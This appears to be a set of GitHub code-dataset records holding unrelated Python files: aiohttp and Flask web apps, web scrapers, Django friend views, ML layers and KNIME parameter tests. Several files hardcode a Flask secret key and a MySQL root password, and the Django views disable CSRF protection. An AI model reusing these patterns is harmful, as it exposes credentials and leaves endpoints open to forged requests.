    ', content_type='text/html',charset='utf-8')\n#GB2312是中国规定的汉字编码,简体中文的字符集编码,\n#GBK是GB2312的扩展 ,兼容GB2312、显示繁体中文、日文的假名\n#UTF-8是全世界通用的\n\n@asyncio.coroutine\ndef logger_factory(app, handler):\n\t@asyncio.coroutine\n\tdef logger(request):\n\t\t#记录日志\n\t\tlogging.info('Request: %s %s' % (request.method, request.path))\n\t\t#继续处理请求\n\t\treturn (yield from handler(request))\n\treturn logger\n\n@asyncio.coroutine\ndef response_factory(app, handler):\n\t@asyncio.coroutine\n\tdef response(request):\n\t\t#结果\n\t\tr = yield from handler(request)\n\t\tif isinstance(r, web.StreamResponse):\n\t\t\treturn r\n\t\tif isinstance(r, bytes):\n\t\t\tresp = web.Response(body=r)\n\t\t\tresp.content_type = 'application/octet=stream'\n\t\t\treturn resp\n\t\tif isinstance(r, str):\n\t\t\tif r.startswith('redirect:'):\n\t\t\t\treturn web.HTTPFound(r[9:])\n\t\t\tresp = web.Response(body=r.encode('utf-8'))\n\t\t\tresp.content_type = 'text/html;charset=utf-8'\n\t\t\treturn resp\n\t\tif isinstance(r, dict):\n\t\t\ttemplate = r.get('__template__')\n\t\t\tif template is None:\n\t\t\t\tresp = web.Response(body=json.dumps(r, ensure_ascii=False, default=lambda o: o.__dict__).encode('utf-8'))\n\t\t\t\tresp.content_type = 'application/json;charset=utf-8'\n\t\t\t\treturn resp \n\t\t\telse:\n\t\t\t\tresp = web.Response(body=app['__template__'].get_template(template).render(**r).encode('utf-8'))\n\t\t\t\tresp.content_type = 'text/html;charset=utf-8'\n\t\t\t\treturn resp\n\t\tif isinstance(r, int) and r >= 100 and r < 60:\n\t\t\treturn web.Response(r)\n\t\tif isinstance(r, tuple) and len(r) == 2:\n\t\t\tt, m = r\n\t\t\tif isinstance(t, int) and t >= 100 and t < 600:\n\t\t\t\treturn web.Response(t, str(m))\n\t\t#default\n\t\tresp = web.Response(body=str(r).encode('utf-8'))\n\t\tresp.content_type = 'text/plain;charset=utf-8'\n\t\treturn resp\n\treturn response\n\n\n\n@asyncio.coroutine\ndef init(loop):\n\tapp = web.Application(loop=loop, middlewares=[logger_factory, response_factory])\n\tinit_jinja2(app, filters=dict(datetime=datetime_filter))\n\tadd_routes(app, 'handlers')\n\tadd_static(app)\n\tapp.router.add_route('GET', '/', index)\n\tsrv = yield from loop.create_server(app.make_handler(), '127.0.0.1', 9000)\n\tlogging.info('server started at http://127.0.0.1:9000...')\n\treturn srv\n#获取EventLoop:\nloop = asyncio.get_event_loop()\n#执行coroutine\nloop.run_until_complete(init(loop))\nloop.run_forever()\n\n","repo_name":"zcy12321/awesone-python-webapp","sub_path":"www/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23864896486","text":"from flask import Flask, render_template, flash, redirect, url_for\nfrom forms import CmdForm, LoadForm, RecipeForm\nimport sys\nimport json\nimport time\nimport argparse\nimport requests\n\n\nimport google_auth\nimport dynamorecipelist\nimport brewque\n\n\nRECIPE_CHOICES=[('porter','porter'),('saison','saison'),('IPA','IPA'),('NEIPA','NEIPA'),('wit','wit')]\n\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'cEumZnHA5QvxVDNXfazEDs7e6Eg368yD'\napp.register_blueprint(google_auth.app)\n\n@app.route('/')\n@app.route('/index')\ndef index():\n if google_auth.is_logged_in():\n user_info = google_auth.get_user_info()\n else:\n user_info = None\n return render_template('index.html', title='Home', user=user_info)\n\n@app.route('/cmd', methods=['GET', 'POST'])\ndef cmd():\n if not google_auth.is_logged_in():\n return (redirect('/'))\n current_state = bq.get_state()\n form = 
CmdForm(command=current_state)\n\n if form.validate_on_submit():\n print('Got command {}'.format(form.command.data))\n if form.command.data in ['terminate','pause','run', 'stop', 'skip']:\n try:\n data = bq.put_command(form.command.data)\n except:\n print('Can not communicate with controller')\n return render_template('cmd.html', title='Command', form=form)\n\n@app.route('/status')\ndef status():\n if not google_auth.is_logged_in():\n return (redirect('/'))\n current_status = bq.get_controller_status()\n return render_template('status.html', title='Status', current_status = current_status)\n\n\n@app.route('/list', methods=['GET', 'POST'])\ndef list():\n if not google_auth.is_logged_in():\n return (redirect('/'))\n equipmentname = bq.get_equipmentname()\n dynamorl.set_equipmentname(equipmentname)\n recipeNameList = dynamorl.get_recipeNameList()\n recipeTupleList = []\n for recipename in recipeNameList:\n recipeTuple = (recipename, recipename)\n recipeTupleList.append(recipeTuple)\n\n # This should come from brewque\n current_recipe = bq.get_recipename()\n form = RecipeForm(recipe=current_recipe)\n form.recipe.choices = recipeTupleList\n\n if form.validate_on_submit():\n print('Got Recipe {}'.format(form.recipe.data))\n recipe2load = dynamorl.get_loadable_recipe(form.recipe.data, equipmentname)\n print('Recipe to load: {}'.format(recipe2load))\n try:\n print('Load recipe here')\n bq.put_recipe(recipe2load)\n except:\n print('Can not communicate with controller')\n #return redirect(url_for('index'))\n print('rerendering')\n #time.sleep(4)\n return render_template('recipe.html', title='Recipe', form=form)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-m\", \"--mqtt\", action='store_true', help='Use mqtt communication')\n group.add_argument(\"-a\", \"--aws\", action='store_true', help='Use aws mqtt communication')\n args = parser.parse_args()\n\n if args.mqtt:\n bq = brewque.brewque(connection='localhost')\n if args.aws:\n bq = brewque.brewque(connection='aws')\n\n\n # Wait for a message to appear\n time.sleep(2)\n dynamorl = dynamorecipelist.dynamorecipelist(bq.get_equipmentname())\n\n app.run(host='0.0.0.0', port=8080)\n","repo_name":"cloudymike/hopitty","sub_path":"src/hopfront/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6135329824","text":"#-*- coding:utf-8 -*-\n# import movies as movies\nimport requests\nimport sys\nimport os\nimport time\nfrom lxml import etree\nimport pymysql\n# douban_txt=open(\"豆瓣电影250.txt\", 'w+', encoding='utf-8')\ndef douban():\n for i in range(10):\n url = 'https://movie.douban.com/top250?start={}&filter='.format(i * 25) #总共10页,用 i*25 保证已25为单位递增\n data = requests.get(url).text#使用get方法发送请求,返回网页数据的Response并存储到对象data 中\n m = etree.HTML(data)##用etree.HTML 来解析变量data(页面数据)\n movie = m.xpath('//*[@id=\"content\"]/div/div[1]/ol/li/div') #定位到主盒子\n for div in movie:\n movie_name = div.xpath('./div[2]/div[1]/a/span[1]/text()')[0]\n movie_pingfen = div.xpath('./div[2]/div[2]/div/span[2]/text()')[0]\n movie_pingjia = div.xpath('./div[2]/div[2]/div/span[4]/text()')[0]\n movie_brief = div.xpath('./div[2]/div[2]/p[2]/span/text()')\n # print (\"电影名称{}——电影评分:{}——评价人数:{}——简介:{}\".format(movie_name,movie_pingfen,movie_pingjia,movie_brief))\n # return movie_name,movie_pingfen,movie_pingjia,movie_brief\n #将数据存入数据库\n db = 
pymysql.connect(host='192.168.100.29', user='root', password='ms123456', port=3306)\n cursor = db.cursor() # 获取游标\n sql = 'insert into douban.douban_movie(movie_name,movie_pingfen,movie_pingjia,movie_brief) values (%s,%s,%s,%s)'\n try:\n cursor.execute(sql, (movie_name, movie_pingfen, movie_pingjia, movie_brief))\n db.commit()\n except:\n db.rollback()\n db.close()\n #存入本地txt文本\ndouban()\n# db = pymysql.connect(host='192.168.100.29',user='root', password='ms123456', port=3306)\n# cursor = db.cursor()#获取游标\n# sql='CREATE TABLE douban.douban_movie (id INT(50) not null,movie_name VARCHAR(100) not null,movie_pingfen VARCHAR(100),movie_pingjia VARCHAR(100),movie_brief VARCHAR( 100 ),PRIMARY key( id ))'\n# sql='insert into douban.douban_movie(movie_name,movie_pingfen,movie_pingjia,movie_brief) values (%s,%s,%s,%s)'\n# try:\n # cursor.execute(sql,(movie_name,movie_pingfen,movie_pingjia,movie_brief))\n # db.commit()\n# except:\n# db.rollback()\n# data = cursor.fetchall()\n# print(data)\n# db.close()","repo_name":"mashenggg/python_v1","sub_path":"douban/douban_movie.py","file_name":"douban_movie.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38127039765","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom .models import Friendship\nfrom Accounts.models import CustomUser\nfrom django.views.decorators.csrf import csrf_exempt\n\n# Create your views here.\n\n\n@csrf_exempt\ndef add_friend(request):\n from_user = request.POST[\"from\"]\n to_user = request.POST[\"to\"]\n friendship = Friendship.objects.filter(\n from_user=from_user, to_user=to_user)\n if friendship.count() != 0:\n return JsonResponse(\"Friend already exists\", safe=False)\n user1 = CustomUser.objects.get(id=from_user)\n user2 = CustomUser.objects.get(id=to_user)\n create_friendship = Friendship(from_user=user1, to_user=user2)\n create_friendship.save()\n return JsonResponse(\"Friend Added Successfully\", safe=False)\n\n\n@csrf_exempt\ndef get_all_friends_of_user(request):\n userId = request.POST[\"userId\"]\n userobj = CustomUser.objects.get(id=userId)\n from_user_side = Friendship.objects.filter(from_user=userobj)\n sent_to_user = Friendship.objects.filter(to_user=userobj)\n print(from_user_side)\n print(sent_to_user)\n\n friendlist = []\n\n for usr in from_user_side.iterator():\n user_to_add = CustomUser.objects.get(id=usr.to_user.id)\n friendlist.append(user_to_add)\n for usr in sent_to_user.iterator():\n user_to_add = CustomUser.objects.get(id=usr.from_user.id)\n friendlist.append(user_to_add)\n print(friendlist)\n\n # REMINDER : In future create this get friend functionality as a function and not a view because it will be used in many different views for different purpose\n # For now returning empty object\n\n return JsonResponse({}, safe=False)\n","repo_name":"Vrundan28/MovieRecommendationSystem","sub_path":"MovieRecommendationApp/Friends/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72585129524","text":"import pandas as pd\r\nimport requests as r\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom selenium import webdriver\r\n#driver = webdriver.Firefox(executable_path=\"D://geckodriver.exe\")\r\nimport re\r\nimport time\r\nfrom pymongo import MongoClient as client\r\nfrom newspaper import Article\r\nclass times_of_india():\r\n def 
__init__(self,content,svc=\"mongodb://localhost:27017/\",driver=\"D://geckodriver.exe\",pagefrom=1,pageto=5):\r\n self.svc=svc\r\n self.content=content\r\n self.driver = webdriver.Firefox(executable_path=driver)\r\n self.driver.set_window_position(0, 0)\r\n self.pagefrom = int(pagefrom)\r\n self.pageto = int(pageto)\r\n def get_sub_links(self):\r\n print(\"Init-Sub-category\")\r\n l=set()\r\n page = r.get(\"https://timesofindia.indiatimes.com/\"+self.content)\r\n soup = bs(page.content,\"html.parser\")\r\n l=set()\r\n for i in soup.find(\"nav\").find_all(\"a\",href=True):\r\n if re.search(\"/\"+self.content+\"/*\",i['href']):\r\n l.add(\"https://timesofindia.indiatimes.com\"+i['href'])\r\n return l\r\n def get_full_links(self):\r\n print(\"Init-Get-Links\")\r\n l=set()\r\n links = self.get_sub_links()\r\n for j in links:\r\n page = r.get(j)\r\n soup=bs(page.content,'html.parser')\r\n try:\r\n for i in soup.find(\"div\",{\"class\":re.compile('main-content*')}).find_all(\"a\",href=True):\r\n \r\n try:\r\n if i['href'].split('.')[-1]=='cms':\r\n if i['href'].split(\"/\")[0]==\"https:\":\r\n l.add(i['href'])\r\n else:\r\n l.add(\"https://timesofindia.indiatimes.com\"+i['href'])\r\n except:\r\n pass\r\n except:\r\n pass\r\n return l\r\n def get_content(self):\r\n link = list(self.get_full_links())\r\n print(\"Started Fetching\")\r\n l=[]\r\n for i in link[self.pagefrom:self.pageto]:\r\n try:\r\n print(i)\r\n d={}\r\n d['Link']=i\r\n page = r.get(i)\r\n d['Content'] = bs(page.content,'html.parser').find(\"div\",{\"class\":re.compile(\"ga-headlines\")}).text\r\n self.driver.get(i)\r\n time.sleep(2)\r\n try:\r\n d['Title']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[1]/h1\").text\r\n except:\r\n d['Title']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[2]/h1\").text\r\n try:\r\n d['Time']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[1]/div/div[1]\").text\r\n except:\r\n d['Time']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[2]/div/div[1]\").text\r\n try:\r\n d['Image']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[2]/section/div/div/img\").get_attribute('src')\r\n except:\r\n d['Image']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[3]/section/div/div/img\").get_attribute('src')\r\n l.append(d)\r\n except:\r\n pass\r\n \r\n return l\r\n\r\n def load_to_database(self):\r\n try:\r\n l=self.get_content()\r\n connect = client(self.svc)\r\n db=connect.internrndd\r\n col = db['timesofindia']\r\n col.insert_many(l)\r\n self.close_drive()\r\n return \"Success\"\r\n except:\r\n self.close_drive()\r\n return \"Error Raised\"\r\n \r\n def close_drive(self):\r\n self.driver.close()","repo_name":"dhanushnayak/InternRnD","sub_path":"Intern/Times_of_india.py","file_name":"Times_of_india.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"12161005138","text":"\"\"\"Implement Layer classes in Tensorflow\"\"\"\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport logging\n\nimport tensorflow as tf\n\nimport luchador\nfrom luchador.nn.core.base import fetch_initializer\nfrom .. 
import wrapper\n\n__all__ = ['BatchNormalization']\n_LG = logging.getLogger(__name__)\n# pylint: disable=no-self-use,no-member,attribute-defined-outside-init\n\n\nclass BatchNormalization(object):\n \"\"\"Implement BatchNormalization in Tensorflow.\n\n See :any:`BaseBatchNormalization` for detail.\n \"\"\"\n def _instantiate_parameters(self, input_shape):\n dim, fmt = len(input_shape), luchador.get_nn_conv_format()\n channel = 1 if dim == 2 or fmt == 'NCHW' else 3\n\n self._axes = tuple(i for i in range(dim) if not i == channel)\n shape = tuple(input_shape[i] for i in range(dim) if i == channel)\n\n const_init = fetch_initializer('ConstantInitializer')\n if self.get_parameter_variable('mean') is None:\n mean = wrapper.make_variable(\n name='mean', shape=shape,\n initializer=const_init(0), trainable=False)\n self.set_parameter_variables(mean=mean)\n\n if self.get_parameter_variable('var') is None:\n var = wrapper.make_variable(\n name='var', shape=shape,\n initializer=const_init(1), trainable=False)\n self.set_parameter_variables(var=var)\n\n if self.get_parameter_variable('scale') is None:\n scale = wrapper.make_variable(\n name='scale', shape=shape, trainable=True,\n initializer=const_init(self.args['scale']))\n self.set_parameter_variables(scale=scale)\n\n if self.get_parameter_variable('offset') is None:\n offset = wrapper.make_variable(\n name='offset', shape=shape, trainable=True,\n initializer=const_init(self.args['offset']))\n self.set_parameter_variables(offset=offset)\n\n def _build(self, input_tensor):\n input_shape = input_tensor.shape\n self._instantiate_parameters(input_shape)\n\n input_ = input_tensor.unwrap()\n decay, epsilon = self.args['decay'], self.args['epsilon']\n\n mean_acc = self.get_parameter_variable('mean').unwrap()\n var_acc = self.get_parameter_variable('var').unwrap()\n scale = self.get_parameter_variable('scale').unwrap()\n offset = self.get_parameter_variable('offset').unwrap()\n\n if self.args['learn']:\n mean_in, var_in = tf.nn.moments(input_, self._axes)\n\n new_mean_acc = decay * mean_acc + (1 - decay) * mean_in\n new_var_acc = decay * var_acc + (1 - decay) * var_in\n\n self._update_operations.append(\n wrapper.Operation(\n op=tf.assign(mean_acc, new_mean_acc),\n name='update_mean',\n )\n )\n self._update_operations.append(\n wrapper.Operation(\n op=tf.assign(var_acc, new_var_acc),\n name='update_var',\n )\n )\n mean_acc = new_mean_acc\n var_acc = new_var_acc\n\n output = tf.nn.batch_normalization(\n x=input_, mean=mean_acc, variance=var_acc, offset=offset,\n scale=scale, variance_epsilon=epsilon)\n return wrapper.Tensor(output, name='output')\n","repo_name":"mthrok/luchador","sub_path":"luchador/nn/core/backend/tensorflow/layer/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"23422356508","text":"import xlrd\nimport numpy as np\n\n\nclass ExcelSheet:\n\n def __init__(self, file_name, **kwargs):\n \"\"\"Initialises the ExcelSheet-Object by parsing the Sheet int a list.\n\n \"\"\"\n try:\n sheet_index = kwargs['sheet_index']\n except KeyError:\n sheet_index = 0\n try:\n wb = xlrd.open_workbook(file_name)\n except FileNotFoundError:\n print(f'File {file_name} not found')\n raise FileNotFoundError\n\n sheet = wb.sheet_by_index(sheet_index)\n self.data = []\n\n for i in range(sheet.nrows):\n row = []\n for j, cell in enumerate(sheet.row_values(i)):\n row.append(cell)\n self.data.append(row)\n\n def 
__iter__(self):\n \"\"\"Return the iterator of the raw data.\"\"\"\n return iter(self.data)\n\n def iter_row(self, row_index):\n return iter(self.data[row_index])\n\n def iter_col(self, col_index):\n column = []\n for row in self.data:\n column.append(row[col_index])\n return iter(column)\n\n def get_data(self):\n return self.data\n\n # def get_box(self, col, row, shape):\n # col, row = self.resolve_index([col, row])\n # return self.data[row-1:shape[1]][-1]\n\n def get_float_box(self, c, r, **kwargs):\n \"\"\"Return a numpy-array of float values with (c,r) top left corner.\"\"\"\n c, r = self.resolve_index([c, r])\n start = self.get_cell_value_unresolved(c, r)\n if not isinstance(start, float):\n raise TypeError(f'{start} is not an float-Object.')\n shape = self.get_float_box_shape(c, r)\n # print(shape)\n f_box = np.zeros(shape, dtype=float)\n # print(f_box)\n for rnum in range(shape[0]):\n for cnum in range(shape[1]):\n try:\n # print(self.get_cell_value_unresolved(\n # c+cnum, r+rnum))\n f_box[rnum, cnum] = self.get_cell_value_unresolved(\n c+cnum, r+rnum)\n except TypeError:\n print(f'\\\"{self.get_cell_value_unresolved(c+cnum, r+rnum)}\\\" cannot be converted to float')\n f_box[rnum, cnum] = None\n except ValueError:\n print(f'\\\"{self.get_cell_value_unresolved(c+cnum, r+rnum)}\\\" cannot be converted to float')\n f_box[rnum, cnum] = None\n try:\n header_shape = [shape[0], 1]\n header_shape[1] = kwargs['header_shape']\n header = self.get_header(c, r, header_shape)\n return f_box, header\n except KeyError:\n return f_box\n\n def get_header(self, c, r, h_shape):\n print(h_shape)\n header = np.zeros(h_shape, dtype='= 97 and ascii_char <= 122:\n return ascii_char-97\n elif ascii_char >= 65 and ascii_char <= 90:\n return ascii_char-65\n else:\n raise TypeError(f'{char} is not a valid character.')\n\n def __str__(self):\n s = ''\n for row in self.data:\n s += str(row[0])\n for cell in row[1:]:\n s += ',' + str(cell)\n s += '\\n'\n return s\n\n\ndef main():\n es = ExcelSheet('Diffusion.xlsx')\n data = es.get_float_box('A', 8)\n print(data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"h-mnzlr/physicsgoe","sub_path":"tools/excels.py","file_name":"excels.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40329052238","text":"import os, re, glob\nimport cv2\nimport numpy as np\nimport shutil\nfrom keras.models import load_model\n\ndef Dataization(img_path):\n img = cv2.imread(img_path)\n return (img / 256)\n\n\nsrc = []\nname = []\ntest = []\nimage_dir = 'test_data/'\nfor file in os.listdir(image_dir):\n if (file.find('.jpg') is not -1):\n src.append(image_dir + file)\n name.append(file)\n test.append(Dataization(image_dir + file))\n\ntest = np.array(test)\nprint(test.shape)\nmodel = load_model('6LBMIv2-20.h5')\npredict = model.predict(test)\nprint(predict.shape)\nprint(\"ImageName : , Predict : [mask, nomask]\")\nfor i in range(len(test)):\n print(name[i] + \" : , Predict : \" + str(predict[i]))","repo_name":"SeongMin2/COVID-19-Face-mask-detector","sub_path":"Model_Test.py","file_name":"Model_Test.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"73518679926","text":"import unittest\nimport knime.extension.parameter as kp\nimport knime.api.schema as ks\nimport knime.extension.nodes as kn\n\ntest_schema = ks.Schema.from_columns(\n [\n ks.Column(\n ks.int32(),\n 
\"IntColumn\",\n {\n \"preferred_value_type\": \"org.knime.core.IntValue\",\n \"displayed_column_type\": \"Integer\",\n },\n ),\n ks.Column(\n ks.double(),\n \"DoubleColumn\",\n {\n \"preferred_value_type\": \"org.knime.core.DoubleValue\",\n \"displayed_column_type\": \"Double\",\n },\n ),\n ks.Column(\n ks.string(),\n \"StringColumn\",\n {\n \"preferred_value_type\": \"org.knime.core.StringValue\",\n \"displayed_column_type\": \"String\",\n },\n ),\n ks.Column(\n ks.list_(ks.int64()),\n \"LongListColumn\",\n {\n \"preferred_value_type\": \"org.knime.core.data.collection.ListDataValue\",\n \"displayed_column_type\": \"Long List\",\n },\n ),\n ]\n)\n\ntest_possible_values = [\n {\n \"id\": \"IntColumn\",\n \"text\": \"IntColumn\",\n \"type\": {\"id\": \"org.knime.core.IntValue\", \"text\": \"Integer\"},\n \"compatibleTypes\": [\"org.knime.core.IntValue\"],\n },\n {\n \"id\": \"DoubleColumn\",\n \"text\": \"DoubleColumn\",\n \"type\": {\"id\": \"org.knime.core.DoubleValue\", \"text\": \"Double\"},\n \"compatibleTypes\": [\"org.knime.core.DoubleValue\"],\n },\n {\n \"id\": \"StringColumn\",\n \"text\": \"StringColumn\",\n \"type\": {\"id\": \"org.knime.core.StringValue\", \"text\": \"String\"},\n \"compatibleTypes\": [\"org.knime.core.StringValue\"],\n },\n {\n \"id\": \"LongListColumn\",\n \"text\": \"LongListColumn\",\n \"type\": {\n \"id\": \"org.knime.core.data.collection.ListDataValue\",\n \"text\": \"Long List\",\n },\n \"compatibleTypes\": [\"org.knime.core.data.collection.ListDataValue\"],\n },\n]\n\n\ndef generate_values_dict(\n int_param=3,\n double_param=1.5,\n string_param=\"foo\",\n multiline_string_param=\"foo\\nbar\",\n bool_param=True,\n column_param=\"foo_column\",\n multi_column_param=[\"foo_column\", \"bar_column\"],\n full_multi_column_param=kp.ColumnFilterConfig(\n included_column_names=[\"foo_column\", \"bar_column\"]\n ),\n first=1,\n second=5,\n third=3,\n):\n return {\n \"model\": {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"multiline_string_param\": multiline_string_param,\n \"bool_param\": bool_param,\n \"column_param\": column_param,\n \"multi_column_param\": multi_column_param,\n \"full_multi_column_param\": full_multi_column_param._to_dict(),\n \"parameter_group\": {\n \"subgroup\": {\"first\": first, \"second\": second},\n \"third\": third,\n },\n }\n }\n\n\ndef generate_values_dict_without_groups(\n int_param=3,\n double_param=1.5,\n string_param=\"foo\",\n bool_param=True,\n column_param=\"foo_column\",\n multi_column_param=[\"foo_column\", \"bar_column\"],\n full_multi_column_param=kp.ColumnFilterConfig(\n included_column_names=[\"foo_column\", \"bar_column\"]\n ),\n):\n return {\n \"model\": {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"bool_param\": bool_param,\n \"column_param\": column_param,\n \"multi_column_param\": multi_column_param,\n \"full_multi_column_param\": full_multi_column_param._to_dict(),\n }\n }\n\n\ndef generate_values_dict_with_one_group(\n int_param=3,\n double_param=1.5,\n string_param=\"foo\",\n bool_param=True,\n column_param=\"foo_column\",\n multi_column_param=[\"foo_column\", \"bar_column\"],\n full_multi_column_param=kp.ColumnFilterConfig(\n included_column_names=[\"foo_column\", \"bar_column\"]\n ),\n first=3,\n second=5,\n):\n return {\n \"model\": {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"bool_param\": bool_param,\n \"column_param\": column_param,\n 
\"multi_column_param\": multi_column_param,\n \"full_multi_column_param\": full_multi_column_param._to_dict(),\n \"parameter_group\": {\n \"first\": first,\n \"second\": second,\n },\n }\n }\n\n\ndef generate_values_dict_for_group_w_custom_method(\n outer_int_param=0, middle_int_param=1, inner_int_param=2, inner_int_param2=2\n):\n return {\n \"model\": {\n \"outer_group\": {\n \"outer_int_param\": outer_int_param,\n \"middle_group\": {\n \"middle_int_param\": middle_int_param,\n \"inner_group\": {\n \"inner_int_param\": inner_int_param,\n \"inner_int_param2\": inner_int_param2,\n },\n },\n }\n }\n }\n\n\ndef set_column_parameters(parameterized_object):\n parameterized_object.column_param = \"foo_column\"\n parameterized_object.multi_column_param = [\"foo_column\", \"bar_column\"]\n parameterized_object.full_multi_column_param = kp.ColumnFilterConfig(\n included_column_names=[\"foo_column\", \"bar_column\"]\n )\n\n\ndef generate_versioned_values_dict(\n int_param=3,\n double_param=1.5,\n string_param=\"foo\",\n bool_param=True,\n first=1,\n second=5,\n extension_version=None,\n):\n model = {}\n if extension_version is None:\n model = {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"bool_param\": bool_param,\n \"group\": {\"first\": first, \"second\": second},\n }\n else:\n if extension_version == \"0.1.0\":\n model = {\n \"int_param\": int_param,\n \"double_param\": double_param,\n }\n elif extension_version == \"0.2.0\":\n model = {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"group\": {\"first\": first},\n }\n elif extension_version == \"0.3.0\":\n model = {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"bool_param\": bool_param,\n \"group\": {\"first\": first, \"second\": second},\n }\n return {\"model\": model}\n\n\ndef generate_versioned_schema_dict(extension_version):\n if extension_version == \"0.1.0\":\n return {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"int_param\": {\n \"title\": \"Int Parameter\",\n \"description\": \"An integer parameter\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"double_param\": {\n \"title\": \"Double Parameter\",\n \"description\": \"A double parameter\",\n \"type\": \"number\",\n \"format\": \"double\",\n },\n },\n }\n },\n }\n elif extension_version == \"0.2.0\":\n return {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"int_param\": {\n \"title\": \"Int Parameter\",\n \"description\": \"An integer parameter\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"double_param\": {\n \"title\": \"Double Parameter\",\n \"description\": \"A double parameter\",\n \"type\": \"number\",\n \"format\": \"double\",\n },\n \"string_param\": {\n \"title\": \"String Parameter\",\n \"description\": \"A string parameter\",\n \"type\": \"string\",\n },\n \"group\": {\n \"type\": \"object\",\n \"properties\": {\n \"first\": {\n \"title\": \"First Parameter\",\n \"description\": \"First parameter description\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n }\n },\n },\n },\n }\n },\n }\n elif extension_version == \"0.3.0\":\n return {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"int_param\": {\n \"title\": \"Int Parameter\",\n \"description\": \"An integer parameter\",\n \"type\": \"integer\",\n 
\"format\": \"int32\",\n },\n \"double_param\": {\n \"title\": \"Double Parameter\",\n \"description\": \"A double parameter\",\n \"type\": \"number\",\n \"format\": \"double\",\n },\n \"string_param\": {\n \"title\": \"String Parameter\",\n \"description\": \"A string parameter\",\n \"type\": \"string\",\n },\n \"bool_param\": {\n \"title\": \"Boolean Parameter\",\n \"description\": \"A boolean parameter\",\n \"type\": \"boolean\",\n },\n \"group\": {\n \"type\": \"object\",\n \"properties\": {\n \"first\": {\n \"title\": \"First Parameter\",\n \"description\": \"First parameter description\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"second\": {\n \"title\": \"Second Parameter\",\n \"description\": \"Second parameter description\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n },\n },\n },\n }\n },\n }\n\n\n#### Primary parameterised object and its groups for testing main functionality: ####\n@kp.parameter_group(\"Subgroup\")\nclass NestedParameterGroup:\n \"\"\"\n A parameter group where the sum of the parameters may not exceed 10.\n Is a subgroup of an external parameter group.\n \"\"\"\n\n first = kp.IntParameter(\n label=\"First Parameter\",\n description=\"First parameter description\",\n default_value=1,\n )\n second = kp.IntParameter(\n label=\"Second Parameter\",\n description=\"Second parameter description\",\n default_value=5,\n )\n\n def validate(self, values):\n if values[\"first\"] + values[\"second\"] > 100:\n raise ValueError(\n \"The sum of the parameters of subgroup must not exceed 100.\"\n )\n\n\n@kp.parameter_group(\"Primary Group\")\nclass ParameterGroup:\n \"\"\"A parameter group which contains a parameter group as a subgroup, and sets a custom validator for a parameter.\"\"\"\n\n subgroup = NestedParameterGroup()\n third = kp.IntParameter(\n label=\"Internal int Parameter\",\n description=\"Internal int parameter description\",\n default_value=3,\n )\n\n @third.validator\n def int_param_validator(value):\n if value < 0:\n raise ValueError(\"The third parameter must be positive.\")\n\n @subgroup.validator(override=False)\n def validate_subgroup(values, version=None):\n if values[\"first\"] + values[\"second\"] < 0:\n raise ValueError(\"The sum of the parameters must be non-negative.\")\n elif values[\"first\"] == 42:\n raise ValueError(\"Detected a forbidden number.\")\n\n\n@kp.parameter_group(\"Primary Group Advanced\", is_advanced=True)\nclass ParameterGroupAdvanced:\n \"\"\"A parameter group which contains a parameter group as a subgroup, has is_advanced set True,\n and sets a custom validator for a parameter.\"\"\"\n\n subgroup = NestedParameterGroup()\n third = kp.IntParameter(\n label=\"Internal int Parameter\",\n description=\"Internal int parameter description\",\n default_value=3,\n )\n\n @third.validator\n def int_param_validator(value):\n if value < 0:\n raise ValueError(\"The third 